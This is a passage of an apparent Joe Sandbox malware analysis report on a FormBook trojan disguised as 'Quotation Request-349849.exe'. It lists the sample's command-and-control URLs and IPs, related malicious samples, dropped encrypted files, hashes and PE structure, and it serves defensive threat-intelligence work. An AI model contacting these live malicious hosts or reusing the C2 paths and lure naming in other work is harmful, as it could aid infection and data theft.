                              http://www.qqa79.top/t67p/?UZkt_p=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK5swGMfjJNS9OKmwWbAAHFg65wmu/s0j5u+YMxZCZuR1sUVf7BfBaxXx&Er=qt9d5Vtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.gk88top.top/vjnn/?UZkt_p=/9P7cPwD5oqcKBw7IJa71uXaMwF5nHy76dLcUokQUTuB+pxwdTZDu/VU2JYamOntzwUAWWcb3dP1W56hEegH2FtKgHUwtP7LZToi+NLiM5u8oda1xOl7pN9QCYN1UR2qYINqcP5uKuM1&Er=qt9d5Vtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.127358.win/2mep/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.127358.win/2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.gk88top.top/vjnn/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.infohive.website/cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5Vtrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabcomp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listcomp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      http://www.sunnyz.storeLcmEonpIrfS.exe, 00000007.00000002.2561468809.0000000004A6A000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://codepen.io/uzcho_/pen/eYdmdXw.csscomp.exe, 00000006.00000002.2561548663.00000000039BA000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002E6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcomp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.aapanel.com/new/download.html?invite_code=aapanelecomp.exe, 00000006.00000002.2561548663.0000000003696000.00000004.10000000.00040000.00000000.sdmp, LcmEonpIrfS.exe, 00000007.00000002.2559865368.0000000002B46000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=comp.exe, 00000006.00000002.2563023705.000000000766E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    38.47.233.21
                                                    		qqa79.topUnited States
                                                    		174COGENT-174UStrue
                                                    172.67.137.47
                                                    		www.gk88top.topUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    217.70.184.50
                                                    		webredir.vip.gandi.netFrance
                                                    		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                    66.29.149.46
                                                    		www.infohive.websiteUnited States
                                                    		19538ADVANTAGECOMUStrue
                                                    206.238.89.119
                                                    		www.127358.winUnited States
                                                    		174COGENT-174USfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1574656
                                                    Start date and time:2024-12-13 13:05:22 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 1s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Quotation Request-349849.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@6/5
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 90%
                                                    • Number of executed functions: 50
                                                    • Number of non-executed functions: 271
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Quotation Request-349849.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    08:38:14API Interceptor1114527x Sleep call for process: comp.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    38.47.233.21Recibos.exeGet hashmaliciousFormBookBrowse
                                                    • www.qqa79.top/dp98/
                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                    • www.qqa79.top/dp98/
                                                    217.70.184.50QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • www.sunnyz.store/ead0/
                                                    PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                    • www.akravchenko.dev/l1qb/
                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                    • www.4nk.education/gnvu/
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • www.4nk.education/gnvu/
                                                    statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                    • www.4nk.education/gnvu/
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • www.astorg-group.info/vdvc/
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • www.astorg-group.info/vdvc/
                                                    XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                    • www.astorg-group.info/vdvc/
                                                    SWIFT.exeGet hashmaliciousFormBookBrowse
                                                    • www.4nk.education/gnvu/?1Do0qp=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FqHTgxtylpm53oBVxwqxSYDOalMgOBA==&yNNX=snRp
                                                    #10302024.exeGet hashmaliciousFormBookBrowse
                                                    • www.4nk.education/gnvu/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    webredir.vip.gandi.netMA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                    • 217.70.184.50
                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    www.infohive.websiteQUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.149.46
                                                    www.127358.winQUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • 206.238.89.119
                                                    lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                    • 206.238.89.119
                                                    Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                    • 206.238.89.119
                                                    IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 206.238.89.119
                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                    • 206.238.89.119
                                                    www.gk88top.topQUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.7.187
                                                    purchase order.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.7.187
                                                    attached invoice.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.7.187
                                                    attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 104.21.7.187

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ADVANTAGECOMUShttps://shinybnb.ch/wp-includes/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 66.29.132.149
                                                    RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.149.46
                                                    prtprr.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.133.226
                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.149.46
                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.149.46
                                                    QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.149.46
                                                    purchase order.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.149.46
                                                    965600.invoice.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.153.238
                                                    rPaymentAdviceNote_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.137.10
                                                    Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                    • 66.29.132.194
                                                    GANDI-ASDomainnameregistrar-httpwwwgandinetFRMA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    PO# 81136575.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                    • 217.70.184.50
                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                    • 217.70.184.50
                                                    CLOUDFLARENETUShttp://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                    • 104.20.2.69
                                                    http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                    • 104.20.3.69
                                                    duschno.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                    • 172.67.74.152
                                                    Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                    • 162.159.137.232
                                                    file.exeGet hashmaliciousAmadey, LummaC Stealer, XmrigBrowse
                                                    • 172.67.139.78
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.192.146
                                                    https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                                    • 1.1.1.1
                                                    https://idw.soundestlink.com/ce/c/675b7a96903a5335b119c33f/675b7ae33d33226215120f66/675b7afd057112d43b49094d?signature=7e9e7eead1b3f32bbe3709a667795cd47f753f0f46ed5e056831680ea81aa102Get hashmaliciousUnknownBrowse
                                                    • 172.64.145.78
                                                    https://opof.utackhepr.com/WE76L1u/Get hashmaliciousUnknownBrowse
                                                    • 104.18.95.41
                                                    COGENT-174USRFQ.pdf.exeGet hashmaliciousXWormBrowse
                                                    • 154.39.0.138
                                                    new1.exeGet hashmaliciousRedLineBrowse
                                                    • 38.180.72.54
                                                    kiyan.exeGet hashmaliciousRedLineBrowse
                                                    • 38.180.109.140
                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 149.29.31.81
                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 143.244.62.231
                                                    arm7.nn-20241213-0355.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 38.186.192.208
                                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 38.7.99.150
                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 149.41.67.4
                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 149.120.173.223
                                                    b3astmode.mpsl.elfGet hashmaliciousMiraiBrowse
                                                    • 38.11.54.120

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\2-64-111

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\comp.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                    Category:modified
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.1215420383712111
                                                    Encrypted:false
                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\autD4EB.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Quotation Request-349849.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.993744669473948
                                                    Encrypted:true
                                                    SSDEEP:6144:/T3i3HD9mVW4ctoXWAxWV/KM3sqiL1n03PPRuraFmoo3SoYfHClUvHgIAoaN:/sZmwLiWMW9KoyLIRuryw3SoYfHClCs
                                                    MD5:988550BFE69A1457D6F461B0F711EE03
                                                    SHA1:E5EFF3207BE78E56A5C8C8E3F97956559E3F7E5E
                                                    SHA-256:2546D8EF5C8B38666FFC7B1D94E3A3308BB3DE3074AEACF51B9F42D8DF1B1FB3
                                                    SHA-512:D5CAA1E718653BA5076F144ECDBC04014D4ACEA30C2D23AC4F188791914F49C25116C53B8B674992E39B89CD7F33CBCD5598B65024E28C5C3ECEBA62D3D2F6EE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...PBRKFPQ5K..FN.CAPARKF.Q5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5K.3FNI\.^A.B.u.4....&.0a 3=,45<.(1](!3c#5a >(t8[k.|.n*,%5o_FLpQ5KP3FN>BH.|2,.i1R.mS!.]..{2,.N...lS!.]..}2,..8V#mS!.GCAPARKF..5K.2GNWXX.ARKFTQ5K.3DOLBJPA.OFTQ5KP3FN.WAPABKFT!1KP3.NGSAPAPKFRQ5KP3FNACAPARKFT!1KP1FNGCAPCR..TQ%KP#FNGCQPABKFTQ5K@3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNi7$(5RKF..1KP#FNG.EPABKFTQ5KP3FNGCAPaRK&TQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKF

                                                    C:\Users\user\AppData\Local\Temp\woolpress

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Quotation Request-349849.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.993744669473948
                                                    Encrypted:true
                                                    SSDEEP:6144:/T3i3HD9mVW4ctoXWAxWV/KM3sqiL1n03PPRuraFmoo3SoYfHClUvHgIAoaN:/sZmwLiWMW9KoyLIRuryw3SoYfHClCs
                                                    MD5:988550BFE69A1457D6F461B0F711EE03
                                                    SHA1:E5EFF3207BE78E56A5C8C8E3F97956559E3F7E5E
                                                    SHA-256:2546D8EF5C8B38666FFC7B1D94E3A3308BB3DE3074AEACF51B9F42D8DF1B1FB3
                                                    SHA-512:D5CAA1E718653BA5076F144ECDBC04014D4ACEA30C2D23AC4F188791914F49C25116C53B8B674992E39B89CD7F33CBCD5598B65024E28C5C3ECEBA62D3D2F6EE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...PBRKFPQ5K..FN.CAPARKF.Q5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5K.3FNI\.^A.B.u.4....&.0a 3=,45<.(1](!3c#5a >(t8[k.|.n*,%5o_FLpQ5KP3FN>BH.|2,.i1R.mS!.]..{2,.N...lS!.]..}2,..8V#mS!.GCAPARKF..5K.2GNWXX.ARKFTQ5K.3DOLBJPA.OFTQ5KP3FN.WAPABKFT!1KP3.NGSAPAPKFRQ5KP3FNACAPARKFT!1KP1FNGCAPCR..TQ%KP#FNGCQPABKFTQ5K@3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNi7$(5RKF..1KP#FNG.EPABKFTQ5KP3FNGCAPaRK&TQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKFTQ5KP3FNGCAPARKF

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.182665717884667
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Quotation Request-349849.exe
                                                    File size:1'201'664 bytes
                                                    MD5:060d1fa22ca3227bef173104f09a853c
                                                    SHA1:d0f22b602ce5640f9594a45008751f027523e1f9
                                                    SHA256:89d993d7acbce99b1378c80d9e0ee143141eb06dd1bd926dd23f941f0ca704ad
                                                    SHA512:7a36e9bce866f0dbac0154422bee73fcb196ab31fe040d4ae1f2327a25d625788a72e735a14fc5ffa7e4bc81d9cfe22a037d9798a5e1c65f83cb93305ffc311f
                                                    SSDEEP:24576:iu6J33O0c+JY5UZ+XC0kGso6Fa+nW7yHRF5bzTgS8gRZ8GWY:Eu0c++OCvkGs9Fa+nZHtvJ8gRWY
                                                    TLSH:3245CF2273DDC360CB669173BF69B7016EBF3C214630B95B2F980D7DA950162262D7A3
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                    File Icon

                                                    Icon Hash:aaf3e3e3938382a0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x427dcd
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x675ACC22 [Thu Dec 12 11:42:26 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FBF48DD2C0Ah
                                                    jmp 00007FBF48DC59D4h
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [esp+10h]
                                                    mov ecx, dword ptr [esp+14h]
                                                    mov edi, dword ptr [esp+0Ch]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FBF48DC5B5Ah
                                                    cmp edi, eax
                                                    jc 00007FBF48DC5EBEh
                                                    bt dword ptr [004C31FCh], 01h
                                                    jnc 00007FBF48DC5B59h
                                                    rep movsb
                                                    jmp 00007FBF48DC5E6Ch
                                                    cmp ecx, 00000080h
                                                    jc 00007FBF48DC5D24h
                                                    mov eax, edi
                                                    xor eax, esi
                                                    test eax, 0000000Fh
                                                    jne 00007FBF48DC5B60h
                                                    bt dword ptr [004BE324h], 01h
                                                    jc 00007FBF48DC6030h
                                                    bt dword ptr [004C31FCh], 00000000h
                                                    jnc 00007FBF48DC5CFDh
                                                    test edi, 00000003h
                                                    jne 00007FBF48DC5D0Eh
                                                    test esi, 00000003h
                                                    jne 00007FBF48DC5CEDh
                                                    bt edi, 02h
                                                    jnc 00007FBF48DC5B5Fh
                                                    mov eax, dword ptr [esi]
                                                    sub ecx, 04h
                                                    lea esi, dword ptr [esi+04h]
                                                    mov dword ptr [edi], eax
                                                    lea edi, dword ptr [edi+04h]
                                                    bt edi, 03h
                                                    jnc 00007FBF48DC5B63h
                                                    movq xmm1, qword ptr [esi]
                                                    sub ecx, 08h
                                                    lea esi, dword ptr [esi+08h]
                                                    movq qword ptr [edi], xmm1
                                                    lea edi, dword ptr [edi+08h]
                                                    test esi, 00000007h
                                                    je 00007FBF48DC5BB5h
                                                    bt esi, 03h
                                                    jnc 00007FBF48DC5C08h

                                                    Rich Headers

                                                    Programming Language:
                                                    • [ASM] VS2013 build 21005
                                                    • [ C ] VS2013 build 21005
                                                    • [C++] VS2013 build 21005
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
                                                    • [ASM] VS2013 UPD4 build 31101
                                                    • [RES] VS2013 build 21005
                                                    • [LNK] VS2013 UPD4 build 31101

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5cc08.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x711c.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0xc70000x5cc080x5ce00af7e6d25623e32330946ebf9848f16b7False0.9285492723755047data7.897393944283926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x1240000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
